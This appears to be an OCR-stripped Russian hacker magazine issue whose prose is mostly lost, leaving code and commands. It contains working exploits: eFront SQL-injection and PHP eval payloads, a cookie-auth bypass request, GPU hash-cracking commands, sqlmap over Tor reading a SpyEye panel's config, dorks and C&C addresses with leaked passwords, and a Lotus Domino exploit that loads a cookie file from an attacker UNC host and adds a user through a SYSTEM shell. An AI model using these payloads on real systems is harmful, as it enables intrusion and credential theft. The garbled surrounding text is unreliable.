, $_GET['HTTP_REFERER'], getUserTimeTarget(),

eF_executeNew(). ,
SQL- URL
:
http://localhost/efront/www/periodic_updater.php?HTTP_REFERER=http://host/?package_ID=[SQL]


$_SERVER['HTTP_REFERER'], , -,
.
.
4. .
/www/index.php:
if (isset($_COOKIE['cookie_login'])
&& isset($_COOKIE['cookie_password']))
{
try {
$user = EfrontUserFactory :: factory(
$_COOKIE['cookie_login']);
$user -> login($_COOKIE['cookie_password'], true);

$_COOKIE['cookie_login'],
EfrontUserFactory::factory(),
,
:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_login=administrator;cookie_login=1;cookie_password=1
Connection: keep-alive

5. PHP-. /www/student.php:
if (isset($_GET['course']) ||
isset($_GET['from_course']))
{
if ($_GET['course'])
{
$course = new EfrontCourse($_GET['course']);
} else {
$course = new EfrontCourse($_GET['from_course']);
}
$eligibility = $course -> checkRules(
$_SESSION['s_login']);

, $_GET['course'] $_GET['from_course'],
EfrontCourse, ,
eval():
/student.php?lessons_ID=1&course[id]=1&course[directions_ID]=1&course[rules]=a:1:{s:19:"1];phpinfo();die;/*";a:1:{s:6:"lesson";i:0;}}
TARGETS

eFront <= 3.6.10 (build 11944).


SOLUTION


MD5

(blog.chivavas.org)

INFO

WWW

ATI
Radeon HD 4850
X2
2,2

!

bit.ly/vEhdir



RainbowCrack
API.

MD5



.

bit.ly/vTSB9K

DVD







MD5.

, . -,
,
,
. , , MD5.
.

: , . ,
.

. - ( )
, . .
MD5.

MD5 128- . , 128- , .


1991
MD4.
1992 RFC 1321. MD5
, CMS
- SSL-.
, MD5 ,
1993 . , . ,
1996-, ,

MD5. , ,
SHA1 ( , ,
SHA2) RIPEMD-160.


MD5 1 2004 .
CertainKey Cryptosystems MD5CRK . -. 24 2004
, ,


, - . , 31 2008 NIST
. SHA1 SHA2.
BLAKE, Gostl, JH,
Keccak Skein. .

I GHASHGPU: GPU

MD5-

. . ,
- : d8578edf8458ce06fbc5bb76a58c5ca4. Ighashgpu, www.golubev.com
.
.
, Ighashgpu GPU,
nVidia ATI c CUDA/
ATI Stream.
, CPU,
.
GPU ,

. , :
Windows:
ighashgpu.exe -t:md5 \
-h:d8578edf8458ce06fbc5bb76a58c5ca4 -max:7

MD5

, ,
.
IBM p690 (,
). :-) 2005
.
X.509 , .
, . 2006
. 2006 , !
. 2008
Chaos Communication Congress
X.509. MD5.

. 2007 , Sony PlayStation3 MD5. : 1,4 MD5- ! , 2009-, BlackHat
USA GPU ,
,
.

?
2011 IETF RFC 1321 (MD5)
RFC 2104 (HMAC-MD5). RFC 6151.
MD5
. ,
MD5. , MD5
, ,
,



, MD5.
.
- (qwerty).
, . d11fd4559815b2c3de1b685bb78a6283, , ,
_admin.
, :
ighashgpu.exe -h:d11fd4559815b2c3de1b685bb78a6283 -t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] -m:??????_admin

'-u' , , '-m' .
,
_admin.
.


, -
.
,
. ,
. ,
,
. ,
, .
- , .
,
.



8- , 126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. , , .

MD5

encrypted.dat

IGHASHGPU:
. ,
. , c00l:
f0b46ac8494b7761adb7203aa7776c2a
f2da202a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89a04a9d94dacf
cb1cb9a40708a151e6c92702342f0ac5
00a931d3facaad384169ebc31d38775c
4966d8547cce099ae6f666f09f68458e

encrypted.dat Ighashgpu
:
ighashgpu.exe -t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] -m:??????c00l encrypted.dat

Ighashgpu ighashgpu_results.txt :
f0b46ac8494b7761adb7203aa7776c2a:1rootxc00l
f2da202a5a215b66995de1f9327dbaa6:pwd12xc00l
c7f7a34bbe8f385faa89a04a9d94dacf:pwd34yc00l
cb1cb9a40708a151e6c92702342f0ac5:pwd56yc00l
4966d8547cce099ae6f666f09f68458e:pwd98zc00l
00a931d3facaad384169ebc31d38775c:pwd78zc00l

IGHASHGPU:


,
.

. 80- ,
, 640 10 ,
. ,
.
2003 , , ,

, -.
- .
.
, ,
- ( ,
64 ).
, .
. ,
. ,
. ,
. .
,
. ,
.

.
, .
.

. , :

var plain = password + "s41t";


var hash = md5(plain);

.
RainbowCrack (project-rainbowcrack.com), Windows,

: 42151cf2ff27c5181bb36a8bcfafea7b.
Ighashgpu -asalt:
ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] \
-asalt:s41t


RAINBOW TABLES
,

8599%.


Linux. : LM/NTLM, MD5 SHA1. ,
- . MD5.
: , ,
. Free Rainbow
Tables (freerainbowtables.com). ,
, , .
3 MD5, SHA1, LM NTLM.
,
. : LM/NTLM, MD5
SHA1 200 .
.
rtgen, RainbowCrack. :
hash_algorithm (LM, NTLM, MD5
SHA1);
charset ,
charset.txt;
plaintext_len_min plaintext_len_max ;
table_index, chain_len, chain_num part_index
, (bit.ly/nndT8M).
:
1. table_index ,
. 0, .
2. chain_len .
3. chain_num .
4. part_index , .
( 0).
MD5:
rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0

,

. Eee PC Intel Atom N450
:). md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt 1,5 .
,
.
rtsort.exe:
rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt

!
. :
d8578edf8458ce06fbc5bb76a58c5ca4. rcrack_gui.exe
Add Hash... File.
OK. .
Search Rainbow Tables... Rainbow Table.
,
md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt,
Open. !
.

VS. CPU VS. GPU


, , Ighashgpu
MD5- , ,
RainbowCrack


.
.
MDCrack, CPU (
).
GPU (nVidia GeForce GT 220M), CPU (Intel Atom N450,
) :

  | GPU      | CPU      |
4 | 00:00:01 | 00:00:01 | 00:00:16
5 | 00:00:02 | 00:00:09 | 00:00:16
6 | 00:00:16 | 00:05:21 | 00:00:10
7 | 00:07:11 | 09:27:52 | 00:00:04

, CPU , GPU .
,
,
. ,
, 4- 5- ,
.
,
. , .


.
-, ,
MD5 SHA1. - SHA2 SHA3
( ). -,
.
.
-,
. ,
100 %, . z


Sanjar Satsura (sanjar@xakep.ru, twitter.com/#!/sanjar_satsura)

-
SPYEYE


.


.

,


.

, , . ,
,
SpyEye. -. ,
gribodemon Zeus, .
][ ,
SpyEye.
.
SpyEye
&C- ( SpyEye
Tracker)
,
.
.


WWW
bit.ly/tBYWgi

Google ;
SpyEyetracker.abuse.ch
SpyEye Tracker;
pastebin.com/T0pUiEJp

;
bit.ly/sXe4PC

SpyEye ;
exploit-db.com

.

WARNING

.
,



,


.

SPYEYE
, SpyEye. . - (form grabbing),
webinjects (webinjects.txt)
( ) ,
. .
,
( , plugins).
DDoS,
RDP, SOCKS-, . .
( #10/2011
][).
( ). SpyEye TDL,
.
, 2009
,
, -
. Symantec, SpyEye
70 % Zeus ( ,
),
.

-, SpyEye
- .
- (C&C)
PHP, -
- . , - .

,
:
1. . ,
, PHP.
PHP-. , , PHP Bug
Scanner, Raz0r (bit.ly/tBFuwY).
crime kits .

SpyEye


SPYEYE
SpyEye Trojan Source Code Published!
.
- ?

, . ,
SpyEye .
,
Xylit0l, , ,
,
, .
, VMProtect,
SpyEye. , .

2. .
, , ,
Google Dorks ( ) .
3. .
Apache, MySQL, PHP ,
.

, ,
. .
,
1.0.2.
,
( frm_cards_edit.php):

Android.
Android.SpyEye.1. , SpyEye.
,
, ,
-. ,
- , ,
,
, -.
,
-. ,
, ,
NNNNNN. Android.SpyEye.1
,
.
: 251340.
-,
, .

$id_card = (int)$_GET['id'];
....
$id_card = $_GET['id']; if (!@$id_card) exit;
$dbase = db_open();if (!$dbase) exit;
$sql = ' SELECT cards.num, cards.csc, cards.exp_date,
cards.name, cards.surname, cards.address, cards.city,
cards.state, cards.post_code, country_t.name_country,
cards.phone_num, email_t.value_email '
. ' FROM cards, country_t, email_t'
. ' WHERE cards.fk_email = email_t.id_email'
. ' AND cards.fk_country = country_t.id_country'
. " AND cards.id_card = $id_card"
. ' LIMIT 0, 1';
$res = mysqli_query ($dbase, $sql);
....

Blind SQLi,
, $id_card
- . gribodemon
int, , ,
:

, gribodemon ,
:). .
, : BENCHMARK() SLEEP().
,
BENCHMARK()
.

SQLI
SQLi
r00tw0rm.com
Havij SQLi-. , frm_findrep_sub2.php, , id
. sqlmap
, SQL- (sqlmap.sourceforge.net):
sqlmap.py -u "http://92.241.1.1/frmcp1/frm_findrep_sub2.php?id=1" --file-read=/var/www/frmcp1/config.php --tor


<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'spyxz');
define('DB_USER', 'admin');


define('DB_PASSWORD', 'SpyEye2db');
# Admin
define('ADMIN_PASSWORD', 'r0t0wVr34xzbdQH');
?>

! !

, SQL-
, .
.
,
. ,
, SpyEye
( SpyEye_b0t.pl). C&C
SpyEye
Tracker (spyeyetracker.abuse.ch). ,

SpyEye. -
, ,
. !
, Google Dork?
.
:
intitle:"SYN 1" "Please, enter password"
intitle:"CN" "Your JavaScript is turned off. Please, enable your JS"
intitle:"SYN" "Your JavaScript is turned off. Please, enable your JS"
"Please, enter password:" inurl:"frm_auth.php"
intitle:"FRMCP"
"index of /SpyEye/"

Google Dorks

mysql db name = "collector"


mysql host = "127.0.0.1"
...

:
http://trylook.ru/frmcp1/
http://212.36.9.59/adm/frmcp/
http://zerocrown.webcindario.com/
http://alaggaer.ans1.rock21.us/SpyEye/main/
http://92.241.165.228/SpyEyeCollector/

, ,
92.241.165.228 ,
:
...
[FOUND] http://92.241.165.228/config.ini
[FOUND] http://92.241.165.228/error.log
[FOUND] http://92.241.165.228/frm_findrep_sub2.php
[FOUND] http://92.241.165.228/mod_perlre.php
[FOUND] http://92.241.165.228/frm_settings.php
.....
[FOUND] http://92.241.165.228/SpyEyeCollector/configs/sec.config
.....

SpyEye (sec.config):
...
listening port for logs = "53"
mysql username = "root"
mysql password = "samsung"
...


!
(root:samsung). .
?
, trylook.ru/frmcp1.
:
....
[FOUND] http://trylook.ru/frmcp1/css/
[FOUND] http://trylook.ru/frmcp1/js/
[FOUND] http://trylook.ru/frmcp1/config.ini
[FOUND] http://trylook.ru/frmcp1/error.log
...
[FOUND] http://trylook.ru/frmcp1/installer/
...

, SpyEye?
,
. , , ,
.


,
- .
.
SpyEye? ,
.
. z


, Digital Security (twitter.com/asintsov)

Lotus,



LOTUS DOMINO CONTROLLER

INFO
IBM Lotus
Domino Server

IBM Lotus
Software,

IBM Lotus
Notes.

WWW
www.zerodayinitiative.com ZDI;
www.ibm.com/software/ru/lotus/ IBM
Lotus Software;
bugtraq.ru BugTraq;
dj.navexpress.com
DJ Java Decompiler.


, ,
,
.

.

.
IBM,
.
, , Lotus.
. . Lotus
: , , . . ,
,
.
, ,
, .
Lotus
. :)
- , ,
names.nsf -.
, , Lotus
8.5.2FP2. , exploit-db.com
.

BugTraq, ZDI, IBM c security- .
, , ,


. ,
, .
,
- ,
. :)

CVE-2011-1519
,
,
( , ). , ZDI ZDI-11-110,
0day ( ). :

Lotus Domino Server
Controller. .
, TCP- 2050.
COOKIEFILE,


.
.
UNC,
. ,
SYSTEM.
:
COOKIEFILE
, \\evilhost\password_cookie_file,
.
, ,
.
.

, , 2050. , Lotus .
.
, .
, , ,
nmap.
Lotus-,
, ,
.
:
socket:reconnect_ssl()
...
socket:send("#API\n")
socket:send( ("#UI %s,%s\n"):format(user,pass) )
socket:receive_lines(1)
socket:send("#EXIT\n")
...

, Lotus-
: SSL-,
#. ,
admin pass
#UI admin,pass. , , nmap
COOKIEFILE . ,
, #COOKIEFILE \\evil\file. , ,
( ,
).

-
. ,
Java, IDA Pro, - . DJ decompiler (members.fortunecity.com/neshkov/dj.html), jar- C:\Program Files\IBM\Lotus\Domino\Data\domino\java\dconsole.jar
Java-.
, NewClient.class,
.
:
// s1 2050/tcp
if(s1.equals("#EXIT"))
return 2;
...
if(s1.equals("#COOKIEFILE"))
if(stringtokenizer.hasMoreTokens())
// . :
// #COOKIEFILE < >
cookieFilename = stringtokenizer.nextToken().trim();
return 7;
...
if(!s1.equals("#UI"))
if(stringtokenizer.hasMoreTokens())
//
usr = stringtokenizer.nextToken(",").trim();
if(usr == null)
return 4;
if(stringtokenizer.hasMoreTokens())
// ,
pwd = stringtokenizer.nextToken().trim();
return 0;
...

.
:
/* */
do{
// ReadFromUser
int i = ReadFromUser();
...
if(i == 6) { // #APPLET
appletConnection = true;
continue;
}
...
userinfo = UserManager.findUser(usr);
if(userinfo == null) {
// ... !
WriteToUser("NOT_REG_ADMIN");
continue;
}
...
if(!appletConnection)
// #APPLET,
flag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
// COOKIE? !
flag = verifyAppletUserCookie(usr, pwd);
...
} while(true); // end loop
if(flag) // ,
// , !
...

,
#APPLET #UI #COOKIEFILE. , , ,
Ncat-



admindata.xml. , ,
( NOT_REG_ADMIN )!

.
adm,
.
verifyAppletUserCookie:
//#COOKIEFILE <cookieFilename>
if(cookieFilename == null || cookieFilename.length() == 0)
return flag;
// !
File file = new File(cookieFilename);
...
inputstreamreader = new InputStreamReader(
new FileInputStream(file),"UTF8");
...
//s7 cookieFilename
do {
if((j = s7.indexOf("<user ", j)) <= 0) break;
...
String s2 = getStringToken(s7, "user=\"", "\"", j, k);
...
String s3 = getStringToken(s7, "cookie=\"", "\"", j, k);
...
String s4 = getStringToken(s7, "address=\"", "\"", j, k);
...
if(s5.equalsIgnoreCase(s2) && s6.equalsIgnoreCase(s3)
&& appletUserAddress.equalsIgnoreCase(s4)) { //!
flag = true; break;
}
...
} while(true);

,
username, password address username, password
address cookiefile, ,
! ,
:
1. <user> .
2. username, password, address.
3. ,
.
4. ,

.

CVE-2011-1519
.
1. cookie.xml:

LOAD CMD.exe /C net user add username password /ADD


BeginData
...

#APPLET , cookie .
#UI,
, #COOKIEFILE.
,
. #EXIT ,
! ? ,
LOAD,
.
, . , IBM
LOAD
, .
, nmap-, ,
. LOAD
, :
ncat --ssl targetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
$whoami
whoamiBeginData
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM
C:\Lotus\Domino\data>

,
.
,
#API , API Java-,
, ncat . ,
Lotus ,
SMBRelay.

?
<user name="usr" cookie="psw" address="dsecrg">

, . ?
, -. -,

, usr .
2. ,
, \\fileserver\public\cookie.xml.
3. ncat:
ncat --ssl targetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT


SMB- ? ,
, UNC ( , ).
,
- . , IBM , : cookiefile
. . ,
- \\evil\cookie\file,
, : .\\evil\cookie\file, UNC . , SSL-,
. . IBM! , cookiefile,
, - XML-
XML-. XML, ! , , IBM,
XML- :
<?xml version="1.0" encoding="UTF-8"?>
<user name="admin" cookie="dsecrg" address="dsecrg">

:
Bla-bla-bla<user name="admin"xXXxcookie="dsecrg"Xaddress="dsecrg"NYA>



. :
1. cookievalues Microsoft HTTPAPI
service ( \r\n Enter):
ncat targethost 49152
GET /<user HTTP/1.0\r\n
\r\n
ncat targethost 49152
GET /user="admin"cookie="pass"address="http://site.com" HTTP/1.0\r\n
\r\n

2. - :
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
...
2011-08-26 11:53:30 10.10.10.101 52902 10.10.9.9 47001 HTTP/1.0 GET <user 404 - NotFound
2011-08-26 11:53:30 10.10.10.101 52905 10.10.9.9 47001 HTTP/1.0 GET name="admin"cookie="pass"address="http://site.com"> 404 - NotFound
...

: IBM
<user , %20 ( ). ,
, <user ( 404 NotFound).
.
3. , -, :
ncat --ssl targetlotus_host 2050
#API




1. ,
. , ,
ARP-POISONING,
(,
Cain, DoS
- mail.ru).
2. , .
, (
). ,
, ,
,
, ,
(,
Java 6 ROP ASLR).
3. IT- ,
- ,
.
4. . .
,

. , , ,
, 99
.
.

#APPLET
#COOKIEFILE ..\..\..\windows\system32\logfiles\httperr\httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass
#EXIT
$whoami
...
NT AUTHORITY/SYSTEM
...

UNC,
- .


. -,
, , .
-, .
-, , - (
, LOAD TELL
).
admindata.xml. MD5. ,
. 4, 25 26 ,

. ,
, ! z


(icq 884888, http://snipper.ru)

X-Tools


:
scarlet0
URL:
bit.ly/tIS6m2
:
Windows

URL:
3.14.by/ru/md5
:
Windows

:
cel1697i845
URL:
bit.ly/vmJ2g8
:
Windows

MSSQL
INJECTION HELPER

MD5-

MSSQL Injection Helper


, SQL.
,
MSSQL.
,

MySQL-.
:
Microsoft
SQL Server;
GUI;

;
;
, ;
;
;
;
.
,
! MSSQL Injection Helper ,
,
URL (, site.com/script.asp?id=1)
.

MD5-
?


BarsWF World Fastest MD5 cracker.
,
MD5-
. ?
:
+ ;
+ -
;
+ ;
- MD5;
- ;
-
.
:
1.
. , Intel Core 2
Quad QX6700 (3,01 GHz)
200
!
2. Radeon:
AMD BROOK, CUDA
NVidia.

,
.
,
,
, .
, ,
?
!
Brutus hashes. New generation


!
, ,
, ,
. :-)

:
1. .
2. , .
3. .
4. ,
.
, . 6 131 066 257 801 .


PCI DSS !
PANBuster ,
, (
) .

PCI DSS,
-
PAN () .
, PANBuster
PCI QSA, ,
,
.
:
Windows, Linux, Mac OS X;
(VISA,

:
XMCO Security
Research Labs
URL:
www.xmco.fr/
panbuster.html
:
*nix/win/mac

:
TIMHOK
URL:
bit.ly/vZbhcN
:
Windows

Mastercard, American Express, JCB, Discover,


China Union);
(
1000 BIN);
PAN
: MySQL, MSSQL (-),
PostgreSQL, Excel, VMware VMDK, Oracle
();
(.ZIP,
.GZ, .TGZ);
.
: (./panbuster
-f ../) , (
- -).

:
YGN Ethical Hacker
Group
URL:
bit.ly/vDpEt8
:
*nix/win

:
SuRGeoNix
URL:
bit.ly/lXxLkm
:
Windows

SCREEN-


JOOMLA!

WEBSURGERY,


,
, screen-. , ,
, ,
. ,
,
. , DDMgr screen-
.
:
;
;
;
;
,
;

( ,
);
,
DDMgr
,
. ,
,
,
.

OWASP Joomla! Vulnerability Scanner


OWASP'
. ,

CMS Joomla!
-
-.
:
;
WAF
;
;
HTML- ;
;

.

,
. :

WebSurgery : -, ,
SQL, XSS,
, WAF,
DoS , -. ,
PHP- vuln.php,
SQL-.
MySQL MD5- . .
1. (Initial Request):


joomscan.pl -u http://joomla-site.com/ \
-x proxy:port

GET /vuln.php?id= HTTP/1.1


HOST: 1.2.3.4

2. -
(List Configuration) : 1 32 ( MD5),
.
3. :
GET /vuln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) HTTP/1.1
HOST: 1.2.3.4


Mifrill (mifrill@real.xakep.ru)


?
, .
,
.
.
,
, ,
,
, , , , .

, , ,
,
. ,
, ,
,

.

, ? Hackerspace
hackspace ,
,
. ,
IT.
, ,

. , ,
, ,
. .

,

.
, , . -
,
do it yourself
( ). , -

{ neuron }

.

,

. , .
,
,
.
, ,
.


:).

C-Base. !

,
, ,
! ,


,
: , , ,

. ,
,
.
,
,
.
, ,
- : 3D-,
,
. ,

.
, ,
- ,
.
,
, ,
.
3050
. ,
10001500 . ,
,
.
, ,
, , ,
,

.
, ,

,
,
-
,
. ,
,
hackerspaces.org, , . ----
.
, ! .
,
.
,
, ,
Neuron
(neuronspace.ru).

. ,
FOSS Labs .
:
, ,
, -. ,
Neuron
.
:
(eSage lab,


-base

London Hackspace (LHC)

NYC Resistor

: www.c-base.org.
: , .
: 300+.
: 17 .

: london.hackspace.org.uk.
: , .
: 300+.
: 5 .

: www.nycresistor.com.
: , -.
: 30+.
: $75115.

C-base
1995 .
.


.
, 2009 ,

.


.
NYC Resistor
. 2008 .


), (Fairwaves, )
(eSage lab).
.

. , ,
,
,
.
, , , ,

, .
CCC ,
, ,
. CCC
, .

,
,
. ,
, C-base .
, .
, , .
. ,
, ,
, - , ... ,
:). ,
, .
Neuron
,
.

. ,
.
,
- , , .

.


.
? .
,
.
,

?



. ,
(
3D-). Neuron
, ,
. ,
Software Defined Radio,
.
WiMAX GSM. ,
,
.
3D-. ,

,
.

Kiberpipa

Metalab

: www.kiberpipa.org.
: , .
: 20 40 ,
.
: .

: www.metalab.at.
: , .
: 130+.
: 20 .


. , 2001
, ,
-.



. 2006 . Metalab
.

,
neuronspace.ru.
,
,
Arduino. , ,
! ,
1517 .
, , , :
. , 15 ,
, 150,
.

, ,
. , Neuron,

, .
,

!
, ,
, , (,
;
).
,
! HackSpace Saint-Petersburg, -



.
- .
, .

: -
3D-, ,
, ,
3D-
.
,
.
, , ,

(hackspace-spb.ru).

, , ?
?

,
(po@kumekay.
com). , :

. , .
, , .
-

, (
29 . .
Mifrill): , -
.
.
40 .
. : ,
, .
, ,



.
,
,
, . ,
,

. ,
,
. ,
( )
. ,

,

C-Base, , ,


NYC Resistor

. , , , ,
.
:

$50100,
(, , ;
1030 ). ,
,
- ,
,
.
, , ,
.
,
,
.
, .
?
? .
.
-
NYC Resistor.
, , MakerBot, 3D-.
30 .
. ,
. -
NYC Resistor :
,
, . ,

. :)
,
, ,
. ,
,
200300 -


. , ,
,
,
.
(, -
, ), .
,
,
, ,
- .
, C-Base 300 .
,
. C-base
.
, ,
, .
, ,
Space Foundation, -


. ,
,
(Space Foundation , ),
,
,
,
. ,
, .

Neuron.
100 .
120 .
( ),
.
: . , ,
. .
:).
6
, 2 . .
Neuron
. ,

. , ,

,
.
,
.
, ,
HackSpace-SPb
. ,
,
,
. z


MALWARE

, Senior malware researcher, ESET

, Stuxnet

.

IDA
Stuxnet,
,

.

WIN32/DUQU:

STUXNET
,
RSS- .

Stuxnet
. , Symantec,
, - , - Duqu. ,
research Stuxnet. , Duqu
Stuxnet , ,
, Stuxnet. =)

,
Cryptography and System Security (CrySyS). Duqu, Stuxnet,

. , CrySyS
-
Duqu , .

. 1. !


.2. .

Duqu ,
.
, .
, , Duqu, Stuxnet,
.


Duqu :
0) doc-, , CVE-2011-3402.
1) - win32k.sys.
2) -, .
3) .
4)
services.exe Duqu . .

- Duqu Stuxnet.
, -, .


,
Duqu .
, -

. 4.

. 5.
Stuxnet

cmi4432.sys,
, C-Media Electronics Inc. ,
, VeriSign
2012 ( 1).
. Duqu
. ,

.

DUQU
,
, 3.
, .
,
, . ,
Duqu , .
4.
,
,
Stuxnet. , , ,
,
. 5 Stuxnet, 6 Duqu.

.3.


(,
): , ,
, , , , , , .
, .
, ,
Duqu Stuxnet.
,
,
. ,

,
Stuxnet, Duqu.


, .


?
Win32/Duqu, , . , ,
.
, Duqu
,
, (
, ).
. , main.dll (
Duqu),
UTC-. 7 ,
.
.
Duqu: the precursor to the next Stuxnet ,
36 ,
. ,
( 8).
, ,
, , -

. 7.

. 8.

. 9.

. 10.

14.10.2011

19.10.2011

1.11.2011

3.11.2011

4.11.2011

CrySyS


.


Duqu: the precursor to the next Stuxnet,


Win32/Duqu.



(, ,
).

(CVE2011-3402),
,

CrySyS.

Microsoft Security Advisory (2639658),



.
,


win32k.sys

TrueType.


CVE-2011-3402
Microsoft
Active Protections Program
(MAPP).

CrySyS, Symantec
Microsoft.
,

,
.


Stuxnet

Duqu

SCADA-

1-day

0-day

RPC-

remote

local

. 11. RPC Duqu

.
, ,
36 , 30. , 11.08.2011,
7:50:01 36
, 9,
18.08.2011, 7:29:07 30 10.

( )

Visual C++

ATL

UPX

RPC- DUQU VS STUXNET


RPC-
Duqu Stuxnet. RPC-
Stuxnet. Duqu ,
Stuxnet under
the Microscope (. 5657), . RPC
Duqu BinDiff,
( 11).
, , Duqu. RPC :

RpcHandler_1 ;
RpcHandler_2
;
RpcHandler_3 ;

Stuxnet vs. Duqu

RpcHandler_4
CreateProcess();
RpcHandler_5 (,
);
RpcHandler_6 ;
RpcHandler_7 .

,
, 12.
RPC-

.

. 12. ,




Stuxnet 80 :),
?.
,
. ,

. , Stuxnet, Duqu

. ,
Duqu,
, , .
-,
.
, , ,
Duqu . z


MALWARE

(http://group.xakep.ru)

:
bootkit test
BITDEFENDER, ESET NOD32, F-SECURE,
OUTPOST SECURITY, RISING

, MBR, :
MS-DOS,
Doom 2
.

.

?
? - !

Outpost Security Suite Pro 7.5


Sinowal NOD

MBR Boot- :

1) BitDefender Internet Security 2012 , BitDef


. ,
.
2) ESET NOD32 Smart Security 5 ,
.
3) F-Secure Internet Security 2012
-.
4) Outpost Security Suite Pro 7.5 Agnutim, . , Outpost
. ,
Comodo.
5) Rising Internet Security Rising.
, .

LET THE CONTEST BEGIN


Windows XP SP3 VmWare
Sinowal, , , 2009 .
Hiew , MBR ,
(
) .
BitDefender. , !
,
( downloader), - 55 %.
.
-, Sinowal BitDefender,
.
NOD32 . temp, MBR. , .

MBR, Sinowal


F-Secure Internet Security Sinowal

F-Secure Internet Security


Win32/Mebroot, NOD32. ,
GUI . -,
MBR . :)
Outpost :
Sinowal, MBR .
, Agnitum -
, .
Rising .
, . ,
VmWare, , (
). -, Sinowal
.

: GHODOW
,
, Sinowal,
.
, Sinowal, , ,
. Win32/Ghodow.
NAD ( ESET).
Ghodow.

MBR


ESET Smart Security 5 Ghodow

, Rising Internet Securit

BitDefender :

.
, BitDefender
Rescue Mode, *nix- , .

: BitDefender .
NOD32 :
MBR- 0.
, , .
MBR,
.
, quick/
- .
,
, , ,
.

Hiew ,
0x200 0x200 0x1000 . , , , ,
MBR. ,
BitDefender, Rising ,
. ,
, , .
, MBR
. , ,

MBR, , .
NTFS- ( , -)
.

-
, MBR.

BitDefender 2012


?
. , , .
, , : ;). z

BitDefender,

BitDefender 2012


Preview
UNIXOID

ANDROID
CyanogenMod,
- ,
2
Android-.
, firmware.
,
,
.

,
,
,
, 3G- ..

Android-
.


.NET-

-.

Microsoft . -.

SYN\ACK




?
, , ,
.


UNIXOID



,
. opensource.

FERRUM


- NAS'
Pentium
IDE- sux! , 12
NAS' .

SYN\ACK




100 . .
?


LOOP
,
,
. .


plaintext (first@plaintext.su, www.plaintext.su)

.NET

.NET FRAMEWORK

,

.


,
,
,
.
,



,

().


INFO
Strong name
,

, ,

WWW
http://gacbrowser.
blogspot.com/
GAC
Browser.
bit.ly/uyxZs5
,


28147-89 C#.

DVD



.

, .NET Framework,
System.Security.Cryptography,
, .NET Framework
CLR
.
.NET,
.

SYSTEM.SECURITY.CRYPTOGRAPHY
, , .NET Framework
System.Security.Cryptography,
:
,
, - . .;

, . .;
X.509 XML-
(XMLSignature).
,
, (. 1). ,

SymmetricAlgorithm,


AsymmetricAlgorithm, HashAlgorithm
KeyedHashAlgorithm ,
-. .NET
, ,
. 28147-89 ,
, ,
.

SYMMETRICALGORITHM
, .NET Framework
SymmetricAlgorithm. MSDN,

:
public virtual ICryptoTransform CreateDecryptor();
public virtual ICryptoTransform CreateEncryptor();
public abstract void GenerateIV();
public abstract void GenerateKey();

,
,
. , ICryptoTransform .
MSDN . ,
ICryptoTransform
. :
int TransformBlock(byte[] inputBuffer,
int inputOffset, int inputCount,
byte[] outputBuffer, int outputOffset);
byte[] TransformFinalBlock(byte[] inputBuffer,
int inputOffset, int inputCount);


, . MSDN
, , SymmetricAlgorithm, ,
(CBC).
, 28147-89
, CBC . ,
.NET Framework , ,
(CFB).
, .

28147-89
, 28147-89
ECB ( )
, .NET Framework CFB.
GostCfb, .

CFB ( )


.NET Framework

using System.Security.Cryptography;

namespace Gost
{
    // Skeleton of the class: method bodies are omitted here
    public class GostCfb : SymmetricAlgorithm
    {
        public GostCfb() {}
        public override ICryptoTransform CreateDecryptor(byte[] rgbKey, byte[] rgbIV) {}
        public override ICryptoTransform CreateDecryptor() {}
        public override ICryptoTransform CreateEncryptor(byte[] rgbKey, byte[] rgbIV) {}
        public override ICryptoTransform CreateEncryptor() {}
        public override void GenerateIV() {}
        public override void GenerateKey() {}
    }
}

.
private static byte[] GetRandomBytes(int bytesCount)
private static void Gamm(byte[] input,
byte[] gamma, byte[] output)

, .NET
FRAMEWORK ,
,


(CFB)

OID

XOR . ,
, .
GetRandomBytes
GenerateIV GenerateKey: IVValue
KeyValue,
.

. , ,
64 256 .



- ,
.
(, ),
(, ).
, .

OID (object identificator),

. OID ,
(,
) ,
. OID

(arcs), :
"{joint-iso-itu-t(2) ds(5) attributeType(4)
distinguishedName(49)}"

"2.5.4.49"

public GostCfb()
{
LegalBlockSizesValue = new[]
{ new KeySizes(64, 64, 0) };
LegalKeySizesValue = new[]
{ new KeySizes(256, 256, 0) };
BlockSizeValue = 64;
KeySizeValue = 256;
}

CreateEncryptor
CreateDecryptor, GostCfb
, ICryptoTransform.
private sealed class GostCfbTransformEncr:ICryptoTransform
{}
private sealed class GostCfbTransformDecr:ICryptoTransform
{}


(
). ASN.1 ,
,
-
.
www.oid-info.com.
ASN.1 -
,
,
. ASN.1
ITU-T, ,
.
.

GOSTCFBTRANSFORMENCR
CreateEncryptor . GostCfb.
, , , .

, ,
, ECB CFB,
,
2 ( , ).
() ,
.

OID ,
,

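// encryption key
private byte[] m_Key;
// feedback register: holds the previous ciphertext block
private byte[] m_State;
// scratch buffer for the encrypted register (the gamma)
private byte[] tmpState;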



:
public int TransformBlock(...)
{
    ...
    byte[] plainBlock = new byte[8];
    int result = 0;
    while (inputCount > 0)
    {
        // take the next 8-byte plaintext block
        Array.Copy(inputBuffer, inputOffset, plainBlock, 0, 8);
